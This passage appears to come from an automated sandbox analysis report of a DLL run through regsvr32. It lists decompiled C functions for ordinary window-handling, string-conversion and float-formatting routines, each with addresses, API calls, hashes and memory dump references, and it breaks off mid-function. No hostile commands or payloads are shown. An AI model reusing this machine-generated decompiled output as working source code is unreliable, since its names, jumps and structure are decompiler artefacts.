                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AtomErrorLastName$Global
                                                                                                                • String ID:
                                                                                                                • API String ID: 815022922-0
                                                                                                                • Opcode ID: 3b690f861f08e89ab78d91b88308261db9ccfc801dcf7cd75de277a0a491c9aa
                                                                                                                • Instruction ID: ee492f502a4a9a34b43089ee40036339920e4bf53d98a0481bb42db3b440c012
                                                                                                                • Opcode Fuzzy Hash: 3b690f861f08e89ab78d91b88308261db9ccfc801dcf7cd75de277a0a491c9aa
                                                                                                                • Instruction Fuzzy Hash: 65018671B00114BBEB11DBB4EDC0EEE77EDDB1A340F6008B2EA46D2150EA74DD919761
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10046149 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E10046149(void* __ebx, void* __ecx, void* __edx, struct tagPOINT* _a8) {
				struct tagPOINT _v12;
				void* __edi;
				struct tagPOINT* _t8;
				struct HWND__* _t9;
				int _t14;
				long _t19;
				void* _t20;
				struct HWND__* _t22;
				struct HWND__* _t23;
				struct HWND__* _t26;

				_t20 = __edx;
				_t8 = _a8;
				_v12.x = _t8->x;
				_t19 = _t8->y;
				_push(_t19);
				_v12.y = _t19;
				_t9 = WindowFromPoint( *_t8);
				_t26 = _t9;
				if(_t26 != 0) {
					_t22 = GetParent(_t26);
					if(_t22 == 0 || E10021BD1(__ebx, _t20, _t22, _t22, 2) == 0) {
						ScreenToClient(_t26,  &_v12);
						_t23 = E10021C73(_t26, _v12.x, _v12.y);
						if(_t23 == 0) {
							L6:
							_t9 = _t26;
						} else {
							_t14 = IsWindowEnabled(_t23);
							_t9 = _t23;
							if(_t14 != 0) {
								goto L6;
							}
						}
					} else {
						_t9 = _t22;
					}
				}
				return _t9;
			}













                                                                                                                0x10046149
                                                                                                                0x1004614e
                                                                                                                0x10046154
                                                                                                                0x10046157
                                                                                                                0x1004615a
                                                                                                                0x1004615d
                                                                                                                0x10046160
                                                                                                                0x10046166
                                                                                                                0x1004616a
                                                                                                                0x10046174
                                                                                                                0x10046178
                                                                                                                0x1004618f
                                                                                                                0x100461a1
                                                                                                                0x100461a5
                                                                                                                0x100461b4
                                                                                                                0x100461b4
                                                                                                                0x100461a7
                                                                                                                0x100461a8
                                                                                                                0x100461b0
                                                                                                                0x100461b2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100461b2
                                                                                                                0x10046186
                                                                                                                0x10046186
                                                                                                                0x10046186
                                                                                                                0x100461b6
                                                                                                                0x100461b9

                                                                                                                APIs
                                                                                                                • WindowFromPoint.USER32 ref: 10046160
                                                                                                                • GetParent.USER32(00000000), ref: 1004616E
                                                                                                                • ScreenToClient.USER32(00000000,?), ref: 1004618F
                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 100461A8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ClientEnabledFromParentPointScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1871804413-0
                                                                                                                • Opcode ID: 3627c711615e78e19aad3e618d6517063d8300fb1da98c20ae8f7686f437bd5c
                                                                                                                • Instruction ID: 1f6c813ac5b2d9a8c95957f1ec1c8b9de4531536b4a4b6380d21aba485b11546
                                                                                                                • Opcode Fuzzy Hash: 3627c711615e78e19aad3e618d6517063d8300fb1da98c20ae8f7686f437bd5c
                                                                                                                • Instruction Fuzzy Hash: 4101A779600511FFD706DB588D44DEE76B9EF8EA80B244165F901D3321FB30DD019BA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10010CBC Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E10010CBC(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* _t16;
				int _t17;
				int _t18;
				struct HWND__* _t19;
				intOrPtr _t25;
				intOrPtr _t33;
				void* _t35;

				_t32 = __edi;
				_t35 = __ecx;
				_t25 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t25 == 0) {
					__eflags =  *((intOrPtr*)(__ecx + 0x14));
					if(__eflags == 0) {
						L3:
						_t17 = E1000A069(0, _t25, _t32, _t35, _t39);
						L4:
						asm("sbb edx, edx");
						_t18 = EnableMenuItem( *(_t25 + 4), _t17, ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
						L11:
						 *((intOrPtr*)(_t35 + 0x18)) = 1;
						return _t18;
					}
					__eflags = _a4;
					if(_a4 == 0) {
						_push(__edi);
						_t33 =  *((intOrPtr*)(__ecx + 0x14));
						_t19 = GetFocus();
						__eflags = _t19 -  *(_t33 + 0x20);
						if(_t19 ==  *(_t33 + 0x20)) {
							SendMessageA( *(E10013FEA(0, _t25, __ebp, GetParent( *(_t33 + 0x20))) + 0x20), 0x28, 0, 0);
						}
					}
					_t18 = E10017979( *((intOrPtr*)(_t35 + 0x14)), _a4);
					goto L11;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					_t17 =  *(__ecx + 8);
					_t39 = _t17 -  *((intOrPtr*)(__ecx + 0x20));
					if(_t17 <  *((intOrPtr*)(__ecx + 0x20))) {
						goto L4;
					}
					goto L3;
				}
				return _t16;
			}












                                                                                                                0x10010cbc
                                                                                                                0x10010cbe
                                                                                                                0x10010cc0
                                                                                                                0x10010cc7
                                                                                                                0x10010cfc
                                                                                                                0x10010cff
                                                                                                                0x10010cd6
                                                                                                                0x10010cd6
                                                                                                                0x10010cdb
                                                                                                                0x10010ce1
                                                                                                                0x10010cf4
                                                                                                                0x10010d3f
                                                                                                                0x10010d3f
                                                                                                                0x00000000
                                                                                                                0x10010d3f
                                                                                                                0x10010d01
                                                                                                                0x10010d05
                                                                                                                0x10010d07
                                                                                                                0x10010d08
                                                                                                                0x10010d0b
                                                                                                                0x10010d11
                                                                                                                0x10010d14
                                                                                                                0x10010d2c
                                                                                                                0x10010d2c
                                                                                                                0x10010d32
                                                                                                                0x10010d3a
                                                                                                                0x00000000
                                                                                                                0x10010d3a
                                                                                                                0x10010ccc
                                                                                                                0x10010cce
                                                                                                                0x10010cd1
                                                                                                                0x10010cd4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10010cd4
                                                                                                                0x10010d48

                                                                                                                APIs
                                                                                                                • EnableMenuItem.USER32 ref: 10010CF4
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                • GetFocus.USER32 ref: 10010D0B
                                                                                                                • GetParent.USER32(?), ref: 10010D19
                                                                                                                • SendMessageA.USER32 ref: 10010D2C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnableException@8FocusH_prolog3ItemMenuMessageParentSendThrow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3849708097-0
                                                                                                                • Opcode ID: 4919a6fd22bf5e50338a9fd7e625461db986646a5d6a2b2f2164b2a6910778ce
                                                                                                                • Instruction ID: 9069f4e229311afcb2c565f3bfcfa1c745c4456fe6fca2b243d7b8774c268526
                                                                                                                • Opcode Fuzzy Hash: 4919a6fd22bf5e50338a9fd7e625461db986646a5d6a2b2f2164b2a6910778ce
                                                                                                                • Instruction Fuzzy Hash: 38118EB1600601EFD720DFA0DD8485AB7F6FF89355B11CA6EF1865A860C771EC84CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10014BE6 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 77%
                                                                                                                			E10014BE6(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t16;
				struct HWND__* _t18;
				struct HWND__* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				struct HWND__* _t25;

				_t23 = __ecx;
				_t22 = __ebx;
				_t24 = GetTopWindow;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t25 = _t16;
					if(_t25 == 0) {
						break;
					}
					__eflags = _a24;
					if(__eflags == 0) {
						SendMessageA(_t25, _a8, _a12, _a16);
					} else {
						_t20 = E10014011(_t23, _t24, _t25, __eflags, _t25);
						__eflags = _t20;
						if(__eflags != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x20)));
							_push(_t20);
							E100148DA(_t22, _t24, _t25, __eflags);
						}
					}
					__eflags = _a20;
					if(_a20 != 0) {
						_t18 = GetTopWindow(_t25);
						__eflags = _t18;
						if(_t18 != 0) {
							E10014BE6(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
						}
					}
					_t16 = GetWindow(_t25, 2);
				}
				return _t16;
			}













                                                                                                                0x10014be6
                                                                                                                0x10014be6
                                                                                                                0x10014bee
                                                                                                                0x10014bf4
                                                                                                                0x10014c57
                                                                                                                0x10014c57
                                                                                                                0x10014c5b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10014bf8
                                                                                                                0x10014bfc
                                                                                                                0x10014c26
                                                                                                                0x10014bfe
                                                                                                                0x10014bff
                                                                                                                0x10014c04
                                                                                                                0x10014c06
                                                                                                                0x10014c08
                                                                                                                0x10014c0b
                                                                                                                0x10014c0e
                                                                                                                0x10014c11
                                                                                                                0x10014c14
                                                                                                                0x10014c15
                                                                                                                0x10014c15
                                                                                                                0x10014c06
                                                                                                                0x10014c2c
                                                                                                                0x10014c30
                                                                                                                0x10014c33
                                                                                                                0x10014c35
                                                                                                                0x10014c37
                                                                                                                0x10014c49
                                                                                                                0x10014c49
                                                                                                                0x10014c37
                                                                                                                0x10014c51
                                                                                                                0x10014c51
                                                                                                                0x10014c60

                                                                                                                APIs
                                                                                                                • GetTopWindow.USER32(?), ref: 10014BF4
                                                                                                                • GetTopWindow.USER32(00000000), ref: 10014C33
                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 10014C51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window
                                                                                                                • String ID:
                                                                                                                • API String ID: 2353593579-0
                                                                                                                • Opcode ID: ddba00b5ca7abc94cbf5f1532f6a01e3883fcc557cee0555f5c466dad4639b0a
                                                                                                                • Instruction ID: 12706a1207a9f1066db5140d4dbce69f4368895b0ea893ea0a3511bb130aeacf
                                                                                                                • Opcode Fuzzy Hash: ddba00b5ca7abc94cbf5f1532f6a01e3883fcc557cee0555f5c466dad4639b0a
                                                                                                                • Instruction Fuzzy Hash: DA01293600252AFBDF529F908E04EDF3A6AEF49391F024010FA1459031CB76C9A2EBE1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10055DC6 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10055DC6(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;
				void* _t29;

				_t28 = __ebx;
				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E1005566C(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E10055758(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E10055CB0(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E10055BDC(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}







                                                                                                                0x10055dc6
                                                                                                                0x10055dc9
                                                                                                                0x10055dcf
                                                                                                                0x10055e42
                                                                                                                0x00000000
                                                                                                                0x10055dd6
                                                                                                                0x10055dd6
                                                                                                                0x10055dd9
                                                                                                                0x10055df4
                                                                                                                0x10055df7
                                                                                                                0x10055e17
                                                                                                                0x10055e29
                                                                                                                0x10055df9
                                                                                                                0x10055df9
                                                                                                                0x10055dfc
                                                                                                                0x00000000
                                                                                                                0x10055dfe
                                                                                                                0x10055e10
                                                                                                                0x10055e10
                                                                                                                0x10055dfc
                                                                                                                0x10055e47
                                                                                                                0x10055e4b
                                                                                                                0x10055ddb
                                                                                                                0x10055df3
                                                                                                                0x10055df3
                                                                                                                0x10055dd9

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                • String ID:
                                                                                                                • API String ID: 3016257755-0
                                                                                                                • Opcode ID: f21a8b7f24a1b2d00343f0b603ae94f06ec36108a82eb02af9b45acdd94f1f67
                                                                                                                • Instruction ID: 600500aa65ffc26479830b01431e16f35ac0bba730854e645dd73247cfad11b1
                                                                                                                • Opcode Fuzzy Hash: f21a8b7f24a1b2d00343f0b603ae94f06ec36108a82eb02af9b45acdd94f1f67
                                                                                                                • Instruction Fuzzy Hash: 3E014B3641014ABBCF169E84DC228EE3F62FB08296F558415FA5899131D337DAB9AB81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10014367 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E10014367(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t9;
				struct HWND__* _t10;
				void* _t14;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				void* _t18;

				_t14 = __ecx;
				_t13 = __ebx;
				_t9 = GetDlgItem(_a4, _a8);
				_t15 = GetTopWindow;
				_t16 = _t9;
				if(_t16 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t17 = _t10;
						__eflags = _t17;
						if(_t17 == 0) {
							goto L10;
						}
						_t10 = E10014367(_t13, _t14, _t17, _a8, _a12);
						__eflags = _t10;
						if(_t10 == 0) {
							_t10 = GetWindow(_t17, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t16) == 0) {
						L3:
						_push(_t16);
						if(_a12 == 0) {
							return E10013FEA(_t13, _t14, _t18);
						}
						_t10 = E10014011(_t14, _t15, _t16, __eflags);
						__eflags = _t10;
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E10014367(__ebx, _t14, _t16, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}













                                                                                                                0x10014367
                                                                                                                0x10014367
                                                                                                                0x10014372
                                                                                                                0x10014378
                                                                                                                0x1001437e
                                                                                                                0x10014382
                                                                                                                0x100143b2
                                                                                                                0x100143b5
                                                                                                                0x100143d2
                                                                                                                0x100143d2
                                                                                                                0x100143d4
                                                                                                                0x100143d6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100143c0
                                                                                                                0x100143c5
                                                                                                                0x100143c7
                                                                                                                0x100143cc
                                                                                                                0x00000000
                                                                                                                0x100143cc
                                                                                                                0x00000000
                                                                                                                0x100143c7
                                                                                                                0x10014384
                                                                                                                0x10014389
                                                                                                                0x1001439b
                                                                                                                0x1001439f
                                                                                                                0x100143a0
                                                                                                                0x00000000
                                                                                                                0x100143a2
                                                                                                                0x100143a9
                                                                                                                0x100143ae
                                                                                                                0x100143b0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001438b
                                                                                                                0x10014392
                                                                                                                0x10014399
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10014399
                                                                                                                0x10014389
                                                                                                                0x100143db
                                                                                                                0x100143db

                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,?), ref: 10014372
                                                                                                                • GetTopWindow.USER32(00000000), ref: 10014385
                                                                                                                  • Part of subcall function 10014367: GetWindow.USER32(00000000,00000002), ref: 100143CC
                                                                                                                • GetTopWindow.USER32(?), ref: 100143B5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Item
                                                                                                                • String ID:
                                                                                                                • API String ID: 369458955-0
                                                                                                                • Opcode ID: ac0814051f65bb9e564b276aa6b1d9ae16531019888a838dddd7f9f351e01bee
                                                                                                                • Instruction ID: 28477358267bbdc3cbc80c072941f90239b0d5c24e60e747c360d6ea668f4f31
                                                                                                                • Opcode Fuzzy Hash: ac0814051f65bb9e564b276aa6b1d9ae16531019888a838dddd7f9f351e01bee
                                                                                                                • Instruction Fuzzy Hash: 82016D36401667B7DB279FA18D04E8E3A99EF453E0F434020FD24AD130EF71DBA196A5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10020BB6 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 50%
                                                                                                                			E10020BB6(short* _a4) {
				char* _v0;
				int _v8;
				int _v16;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t6;
				char* _t7;
				void* _t12;
				char* _t13;
				void* _t15;
				void* _t16;
				short* _t20;

				_t20 = _a4;
				if(_t20 != 0) {
					__imp__#7(_t20, _t16, _t12);
					_v8 = _t6;
					_t7 = WideCharToMultiByte(0, 0, _t20, _t6, 0, 0, 0, 0);
					_v0 = _t7;
					__imp__#150(0, _t7);
					_t13 = _t7;
					__eflags = _t13;
					if(__eflags == 0) {
						E1000A035(_t13, _t15, WideCharToMultiByte, 0, __eflags);
					}
					WideCharToMultiByte(0, 0, _t20, _v16, _t13, _v8, 0, 0);
					return _t13;
				}
				return 0;
			}


















                                                                                                                0x10020bb8
                                                                                                                0x10020bc1
                                                                                                                0x10020bca
                                                                                                                0x10020bde
                                                                                                                0x10020be2
                                                                                                                0x10020be6
                                                                                                                0x10020bea
                                                                                                                0x10020bf0
                                                                                                                0x10020bf2
                                                                                                                0x10020bf4
                                                                                                                0x10020bf6
                                                                                                                0x10020bf6
                                                                                                                0x10020c09
                                                                                                                0x00000000
                                                                                                                0x10020c0e
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • SysStringLen.OLEAUT32(?), ref: 10020BCA
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,1003A10E,00000000,00000018,1003A454), ref: 10020BE2
                                                                                                                • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 10020BEA
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,1003A10E,00000000,00000018,1003A454), ref: 10020C09
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 3384502665-0
                                                                                                                • Opcode ID: 540ecca906062b1386f6dcc704f4736bdd490e4b4e745cc514e637d6b43f55ac
                                                                                                                • Instruction ID: bc6146377f226ddcd5a13c169ad88fc722b0135e4b7495619c3a979ed2f1c725
                                                                                                                • Opcode Fuzzy Hash: 540ecca906062b1386f6dcc704f4736bdd490e4b4e745cc514e637d6b43f55ac
                                                                                                                • Instruction Fuzzy Hash: 78F06272106378BFE7215B629C8CC9BBE9CFE8B2E47010619F54892110D6259810C6F0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1005803B Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 89%
                                                                                                                			E1005803B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
